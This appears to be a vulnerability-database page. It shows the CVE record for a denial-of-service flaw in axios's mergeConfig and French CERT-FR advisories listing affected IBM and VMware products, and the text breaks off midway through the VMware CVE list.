Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2026-25639 (GCVE-0-2026-25639)
Vulnerability from cvelistv5 – Published: 2026-02-09 20:11 – Updated: 2026-02-18 17:16- CWE-754 - Improper Check for Unusual or Exceptional Conditions
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-25639",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-02-10T15:39:46.394625Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-02-10T15:59:44.468Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "axios",
"vendor": "axios",
"versions": [
{
"status": "affected",
"version": "\u003e= 1.0.0, \u003c 1.13.5"
},
{
"status": "affected",
"version": "\u003c 0.30.3"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Axios is a promise based HTTP client for the browser and Node.js. Prior to versions 0.30.3 and 1.13.5, the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service. This vulnerability is fixed in versions 0.30.3 and 1.13.5."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-754",
"description": "CWE-754: Improper Check for Unusual or Exceptional Conditions",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-02-18T17:16:16.391Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433"
},
{
"name": "https://github.com/axios/axios/pull/7369",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/axios/axios/pull/7369"
},
{
"name": "https://github.com/axios/axios/pull/7388",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/axios/axios/pull/7388"
},
{
"name": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57"
},
{
"name": "https://github.com/axios/axios/commit/d7ff1409c68168d3057fc3891f911b2b92616f9e",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/axios/axios/commit/d7ff1409c68168d3057fc3891f911b2b92616f9e"
},
{
"name": "https://github.com/axios/axios/releases/tag/v0.30.3",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/axios/axios/releases/tag/v0.30.3"
},
{
"name": "https://github.com/axios/axios/releases/tag/v1.13.5",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/axios/axios/releases/tag/v1.13.5"
}
],
"source": {
"advisory": "GHSA-43fc-jf86-j433",
"discovery": "UNKNOWN"
},
"title": "Axios affected by Denial of Service via __proto__ Key in mergeConfig"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-25639",
"datePublished": "2026-02-09T20:11:22.374Z",
"dateReserved": "2026-02-04T05:15:41.791Z",
"dateUpdated": "2026-02-18T17:16:16.391Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-25639",
"date": "2026-04-15",
"epss": "0.00051",
"percentile": "0.15766"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2026-25639\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-02-09T21:15:49.010\",\"lastModified\":\"2026-02-18T18:24:34.120\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Axios is a promise based HTTP client for the browser and Node.js. Prior to versions 0.30.3 and 1.13.5, the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service. This vulnerability is fixed in versions 0.30.3 and 1.13.5.\"},{\"lang\":\"es\",\"value\":\"Axios es un cliente HTTP basado en promesas para el navegador y Node.js. Antes de la versi\u00f3n 1.13.5, la funci\u00f3n mergeConfig en axios falla con un TypeError al procesar objetos de configuraci\u00f3n que contienen __proto__ como propiedad propia. Un atacante puede desencadenar esto proporcionando un objeto de configuraci\u00f3n malicioso creado a trav\u00e9s de JSON.parse(), causando una denegaci\u00f3n de servicio completa. Esta vulnerabilidad se corrigi\u00f3 en la versi\u00f3n 1.13.5.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-754\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:axios:axios:*:*:*:*:*:node.js:*:*\",\"versionEndExcluding\":\"1.13.5\",\"matchCriteriaId\":\"A8935935-994A-4A4E-9FBB-E83C9EF0B2E3\"}]}]}],\"references\":[{\"url\":\"https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/axios/axios/commit/d7ff1409c68168d3057fc3891f911b2b92616f9e\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/axios/axios/pull/7369\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/axios/axios/pull/7388\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/axios/axios/releases/tag/v0.30.3\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/axios/axios/releases/tag/v1.13.5\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\",\"Release Notes\"]},{\"url\":\"https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-25639\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-02-10T15:39:46.394625Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-02-10T15:39:47.277Z\"}}], \"cna\": {\"title\": \"Axios affected by Denial of Service via __proto__ Key in mergeConfig\", \"source\": {\"advisory\": \"GHSA-43fc-jf86-j433\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"axios\", \"product\": \"axios\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 1.0.0, \u003c 1.13.5\"}, {\"status\": \"affected\", \"version\": \"\u003c 0.30.3\"}]}], \"references\": [{\"url\": \"https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433\", \"name\": \"https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/axios/axios/pull/7369\", \"name\": \"https://github.com/axios/axios/pull/7369\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/axios/axios/pull/7388\", \"name\": \"https://github.com/axios/axios/pull/7388\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57\", \"name\": \"https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/axios/axios/commit/d7ff1409c68168d3057fc3891f911b2b92616f9e\", \"name\": \"https://github.com/axios/axios/commit/d7ff1409c68168d3057fc3891f911b2b92616f9e\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/axios/axios/releases/tag/v0.30.3\", \"name\": \"https://github.com/axios/axios/releases/tag/v0.30.3\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/axios/axios/releases/tag/v1.13.5\", \"name\": \"https://github.com/axios/axios/releases/tag/v1.13.5\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Axios is a promise based HTTP client for the browser and Node.js. Prior to versions 0.30.3 and 1.13.5, the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service. This vulnerability is fixed in versions 0.30.3 and 1.13.5.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-754\", \"description\": \"CWE-754: Improper Check for Unusual or Exceptional Conditions\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-02-18T17:16:16.391Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-25639\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-02-18T17:16:16.391Z\", \"dateReserved\": \"2026-02-04T05:15:41.791Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-02-09T20:11:22.374Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
CERTFR-2026-AVI-0424
Vulnerability from certfr_avis - Published: 2026-04-10 - Updated: 2026-04-10
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | Sterling | Sterling External Authentication Server versions 6.1.1.x antérieures à 6.1.1.3 GA | ||
| IBM | N/A | WebSphere Application Server Liberty versions 17.0.0.3 à 26.0.0.3 sans le correctif APAR PH70510 | ||
| IBM | QRadar SIEM | QRadar AI Assistant pour QRadar SIEM versions antérieures à 1.4.0 | ||
| IBM | Sterling | Sterling Secure Proxy versions 6.1.0.x antérieures à 6.1.0.4 GA | ||
| IBM | Sterling | Sterling Secure Proxy versions 6.2.1.x antérieures à 6.2.1.2 GA |
| Title | Publication Time | Tags | ||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Sterling External Authentication Server versions 6.1.1.x ant\u00e9rieures \u00e0 6.1.1.3 GA",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Application Server Liberty versions 17.0.0.3 \u00e0 26.0.0.3 sans le correctif APAR PH70510",
"product": {
"name": "N/A",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar AI Assistant pour QRadar SIEM versions ant\u00e9rieures \u00e0 1.4.0",
"product": {
"name": "QRadar SIEM",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Secure Proxy versions 6.1.0.x ant\u00e9rieures \u00e0 6.1.0.4 GA",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Secure Proxy versions 6.2.1.x ant\u00e9rieures \u00e0 6.2.1.2 GA",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2026-26007",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26007"
},
{
"name": "CVE-2026-21933",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21933"
},
{
"name": "CVE-2026-21932",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21932"
},
{
"name": "CVE-2026-27205",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27205"
},
{
"name": "CVE-2026-27025",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27025"
},
{
"name": "CVE-2026-22029",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22029"
},
{
"name": "CVE-2026-22030",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22030"
},
{
"name": "CVE-2026-21925",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21925"
},
{
"name": "CVE-2026-27024",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27024"
},
{
"name": "CVE-2020-10878",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-10878"
},
{
"name": "CVE-2025-68161",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68161"
},
{
"name": "CVE-2026-28351",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-28351"
},
{
"name": "CVE-2026-21884",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21884"
},
{
"name": "CVE-2020-10543",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-10543"
},
{
"name": "CVE-2026-27199",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27199"
},
{
"name": "CVE-2026-26013",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26013"
},
{
"name": "CVE-2020-12723",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-12723"
},
{
"name": "CVE-2026-24842",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-24842"
},
{
"name": "CVE-2026-23950",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23950"
},
{
"name": "CVE-2026-2327",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-2327"
},
{
"name": "CVE-2026-27888",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27888"
},
{
"name": "CVE-2026-29786",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-29786"
},
{
"name": "CVE-2026-25528",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25528"
},
{
"name": "CVE-2025-40909",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40909"
},
{
"name": "CVE-2026-25639",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25639"
},
{
"name": "CVE-2026-21945",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21945"
},
{
"name": "CVE-2025-12194",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-12194"
},
{
"name": "CVE-2026-27026",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27026"
},
{
"name": "CVE-2026-27212",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27212"
},
{
"name": "CVE-2026-24688",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-24688"
},
{
"name": "CVE-2026-29063",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-29063"
},
{
"name": "CVE-2026-27628",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27628"
}
],
"initial_release_date": "2026-04-10T00:00:00",
"last_revision_date": "2026-04-10T00:00:00",
"links": [],
"reference": "CERTFR-2026-AVI-0424",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2026-04-10T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Injection de requ\u00eates ill\u00e9gitimes par rebond (CSRF)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0 distance et une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2026-04-06",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7268602",
"url": "https://www.ibm.com/support/pages/node/7268602"
},
{
"published_at": "2026-04-07",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7268724",
"url": "https://www.ibm.com/support/pages/node/7268724"
},
{
"published_at": "2026-04-07",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7268726",
"url": "https://www.ibm.com/support/pages/node/7268726"
},
{
"published_at": "2026-04-06",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7268604",
"url": "https://www.ibm.com/support/pages/node/7268604"
},
{
"published_at": "2026-04-06",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7268649",
"url": "https://www.ibm.com/support/pages/node/7268649"
},
{
"published_at": "2026-04-07",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7268725",
"url": "https://www.ibm.com/support/pages/node/7268725"
}
]
}
CERTFR-2026-AVI-0326
Vulnerability from certfr_avis - Published: 2026-03-20 - Updated: 2026-03-20
De multiples vulnérabilités ont été découvertes dans les produits VMware. Elles permettent à un attaquant de provoquer un problème de sécurité non spécifié par l'éditeur.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
| Vendor | Product | Description | ||
|---|---|---|---|---|
| VMware | Tanzu Platform | Isolation Segmentation pour VMware Tanzu Platform versions antérieures à 6.0.26+LTS-T | ||
| VMware | Tanzu Platform | Isolation Segmentation pour VMware Tanzu Platform versions antérieures à 10.3.6 | ||
| VMware | Tanzu Platform | App Autoscaler CLI Plugin pour VMware Tanzu Platform versions antérieures à 250.6.9 | ||
| VMware | N/A | Python Buildpack versions antérieures à 1.8.83 | ||
| VMware | Tanzu Platform | Tanzu Platform versions antérieures à 3.1.9 | ||
| VMware | Tanzu Platform | Tanzu RabbitMQ sur Tanzu Platform versions antérieures à 2.4.4 | ||
| VMware | N/A | PHP Buildpack versions antérieures à 4.6.69 | ||
| VMware | Tanzu Platform | Tanzu Platform versions antérieures à 3.2.5 | ||
| VMware | Tanzu Platform | Elastic Application Runtime Windows add-on pour VMware Tanzu Platform versions antérieures à 10.2.9+LTS-T | ||
| VMware | Tanzu Platform | App Autoscaler CLI Plugin pour VMware Tanzu Platform versions antérieures à 250.5.17 | ||
| VMware | Tanzu Platform | Tanzu RabbitMQ pour Tanzu Platform versions antérieures à 10.1.2 | ||
| VMware | Tanzu Platform | Tanzu Platform versions antérieures à 2.4.6 | ||
| VMware | Tanzu Platform | Tanzu Platform versions antérieures à 1.16.18 | ||
| VMware | Tanzu Platform | Tanzu for Valkey sur Tanzu Platform versions antérieures à 10.2.2 | ||
| VMware | Tanzu Platform | Elastic Application Runtime Windows add-on pour VMware Tanzu Platform versions antérieures à 6.0.26+LTS-T | ||
| VMware | Tanzu Platform | Isolation Segmentation pour VMware Tanzu Platform versions antérieures à 10.2.9+LTS-T | ||
| VMware | Tanzu Platform | Elastic Application Runtime Windows add-on pour VMware Tanzu Platform versions antérieures à 10.3.6 |
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Isolation Segmentation pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 6.0.26+LTS-T",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Isolation Segmentation pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 10.3.6",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "App Autoscaler CLI Plugin pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 250.6.9",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Python Buildpack versions ant\u00e9rieures \u00e0 1.8.83",
"product": {
"name": "N/A",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu Platform versions ant\u00e9rieures \u00e0 3.1.9",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu RabbitMQ sur Tanzu Platform versions ant\u00e9rieures \u00e0 2.4.4",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "PHP Buildpack versions ant\u00e9rieures \u00e0 4.6.69",
"product": {
"name": "N/A",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu Platform versions ant\u00e9rieures \u00e0 3.2.5",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Elastic Application Runtime Windows add-on pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 10.2.9+LTS-T",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "App Autoscaler CLI Plugin pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 250.5.17",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu RabbitMQ pour Tanzu Platform versions ant\u00e9rieures \u00e0 10.1.2",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu Platform versions ant\u00e9rieures \u00e0 2.4.6",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu Platform versions ant\u00e9rieures \u00e0 1.16.18",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu for Valkey sur Tanzu Platform versions ant\u00e9rieures \u00e0 10.2.2",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Elastic Application Runtime Windows add-on pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 6.0.26+LTS-T",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Isolation Segmentation pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 10.2.9+LTS-T",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Elastic Application Runtime Windows add-on pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 10.3.6",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2026-28422",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-28422"
},
{
"name": "CVE-2024-36903",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36903"
},
{
"name": "CVE-2024-35875",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35875"
},
{
"name": "CVE-2022-50759",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50759"
},
{
"name": "CVE-2026-26007",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26007"
},
{
"name": "CVE-2025-71075",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71075"
},
{
"name": "CVE-2024-49912",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49912"
},
{
"name": "CVE-2024-36026",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36026"
},
{
"name": "CVE-2026-23198",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23198"
},
{
"name": "CVE-2023-3640",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3640"
},
{
"name": "CVE-2024-27435",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27435"
},
{
"name": "CVE-2025-40273",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40273"
},
{
"name": "CVE-2023-53714",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53714"
},
{
"name": "CVE-2024-42122",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42122"
},
{
"name": "CVE-2025-68230",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68230"
},
{
"name": "CVE-2026-28420",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-28420"
},
{
"name": "CVE-2022-49069",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49069"
},
{
"name": "CVE-2024-57875",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57875"
},
{
"name": "CVE-2022-27943",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-27943"
},
{
"name": "CVE-2025-40064",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40064"
},
{
"name": "CVE-2023-54129",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54129"
},
{
"name": "CVE-2025-66865",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66865"
},
{
"name": "CVE-2024-41031",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41031"
},
{
"name": "CVE-2025-39992",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39992"
},
{
"name": "CVE-2025-69534",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-69534"
},
{
"name": "CVE-2025-61730",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61730"
},
{
"name": "CVE-2022-49543",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49543"
},
{
"name": "CVE-2026-23202",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23202"
},
{
"name": "CVE-2025-38485",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38485"
},
{
"name": "CVE-2023-53562",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53562"
},
{
"name": "CVE-2025-68324",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68324"
},
{
"name": "CVE-2025-22026",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22026"
},
{
"name": "CVE-2023-54149",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54149"
},
{
"name": "CVE-2025-71086",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71086"
},
{
"name": "CVE-2024-50063",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50063"
},
{
"name": "CVE-2023-33875",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-33875"
},
{
"name": "CVE-2024-41001",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41001"
},
{
"name": "CVE-2024-42155",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42155"
},
{
"name": "CVE-2026-23167",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23167"
},
{
"name": "CVE-2025-36353",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36353"
},
{
"name": "CVE-2025-68196",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68196"
},
{
"name": "CVE-2024-46770",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46770"
},
{
"name": "CVE-2023-53247",
